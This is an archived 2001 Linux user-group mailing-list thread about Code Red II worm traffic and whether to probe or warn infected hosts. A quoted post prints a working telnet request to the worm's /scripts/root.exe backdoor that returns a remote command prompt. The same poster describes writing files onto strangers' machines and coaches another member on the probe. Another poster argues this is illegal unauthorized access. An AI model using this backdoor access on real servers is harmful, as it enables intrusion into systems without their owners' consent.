CR worm infection attempts
Chris Cowan
plug-discuss@lists.PLUG.phoenix.az.us
Thu, 9 Aug 2001 09:00:51 -0700
I thought an open door is like an open invitation... or is that just what my
high school gym teacher just said...
Chris
----- Original Message -----
From: "George Toft" <george@georgetoft.com>
To: <plug-discuss@lists.PLUG.phoenix.az.us>
Sent: Thursday, August 09, 2001 8:03 AM
Subject: Re: CR worm infection attempts
> If you are walking down the street, and see a house with the door
> open, do you walk in to see if anyone is home? When you return, and
> see the windows broken out, and the outside spray-painted, how do you
> feel? I think this is a similar situation - if you walk in uninvited,
> it's called "illegal entry" and you may be arrested. Likewise, testing
> a site to see if it has been exploited is illegal as you were accessing
> their computer in an unauthorized fashion.
>
> Could you have stopped the crimes in both cases? Maybe (if the owner
> listened to you). Is it worth the risk to you, your reputation, and
> your family? No. I am not selfish - I am placing my family ahead of
> strangers, and they rely upon my income. I suggest you do the same -
> just keep on walking, and make sure you have the safeguards of Fort
> Knox at home.
>
> George
>
>
> Derek Neighbors wrote:
> >
> > That is the problem.
> >
> > I looked at my logs out of curiosity. I was AMAZED at the figured. I
> > took the first IP and hit it and checked for the root.exe exploit. Sure
> > enough it was WIDE open.
> >
> > Now I had a DILEMMA on my hands. Do I notify this company or not? I
had
> > no malicous intent nor did I do anything. The 'good' in me wanted to
> > notify them so that they were not 'toasted' by one will 'ill' intent.
> >
> > HOWEVER, I feared lawsuit, death and dismemberment. So I said not a
word.
> > I looked at thier website about 4 hours later and they were defaced. :(
> >
> > What kind of a world is it? I mean if I was walking down the street
with
> > my fly open, I would hope to God someone would tell me. However, I
> > suppose even in that case you should be careful. I mean after all,
> > noftifying someone that thier fly was open, means you were looking at
> > thier crotch. If you were looking at their crotch you must have been
> > wanting to rape them or harass them.
> >
> > Where does the silliness stop?
> >
> > -Derek
> >
> > On Wed, 8 Aug 2001, Kim Allen wrote:
> >
> > > I've been contacting the sites that my server logs shows that have
been
> > > hitting me with the code red signature and so far no one has bothered
to
> > > respond except for one. However that site has told me how secure they
are
> > > and how there is no way that they have any problems. When I sent them
the
> > > portions of my server logs showing they do have problem they threaten
> > > legal action. Anyone else have had this type of response?
> > >
> > > > To answer your question... make sure you're hitting enter TWICE
after
> > > > the command.
> > > >
> > > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > > Check it out:
> > > >
> > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > > Trying xxx.xxx.xxx.xxx...
> > > > Connected to xxx.xxx.xxx.xxx.
> > > > Escape character is '^]'.
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > HTTP/1.1 200 OK
> > > > Server: Microsoft-IIS/5.0
> > > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > > Content-Type: application/octet-stream
> > > > Microsoft Windows 2000 [Version 5.00.2195]
> > > > (C) Copyright 1985-1999 Microsoft Corp.
> > > >
> > > > c:\inetpub\scripts>
> > > >
> > > > >From here, I've been leaving a nice text file on \\ALL USERS\\
desktop's
> > > > that explains how I did it, and why they need to pay attention to
> > > > security patches. :)
> > > >
> > > > Hopefully they won't take it the 'wrong' way.
> > > >
> > > > ~g~
> > > >
> > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > > Wayne Conrad wrote:
> > > > > >
> > > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > > I got tired of counting and just started putting the info into
my IDS page.
> > > > > > > That way I can send complaints and point them to a URL so I
don't have to
> > > > > > > keep recreating the same data each time.
> > > > > >
> > > > > > Are you putting the IP's up too? Every one of the CRII infected
boxes is rooted... I wonder about the goodness of publishing a list of
known rooted boxes.
> > > > > > Wayne
> > > > > ________________________________________________
> > > > >
> > > > > I've been trying that out
> > > > >
> > > > > telnet ipaddress_from_my_httpd_access_log 80
> > > > >
> > > > > GET /scripts/root.exe HTTP/1.0
> > > > >
> > > > > but I can't get a command prompt - what am I missing?
> > > > >
> > > > > Craig
> > > > > ________________________________________________
> > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail
doesn't post to the list quickly and you use Netscape to write mail.
> > > > >
> > > > > PLUG-discuss mailing list -
PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > > >
> > > >
> > > >
> > > > ________________________________________________
> > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail
doesn't post to the list quickly and you use Netscape to write mail.
> > > >
> > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > >
> > >
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail
doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > >
> >
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't
post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't
post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>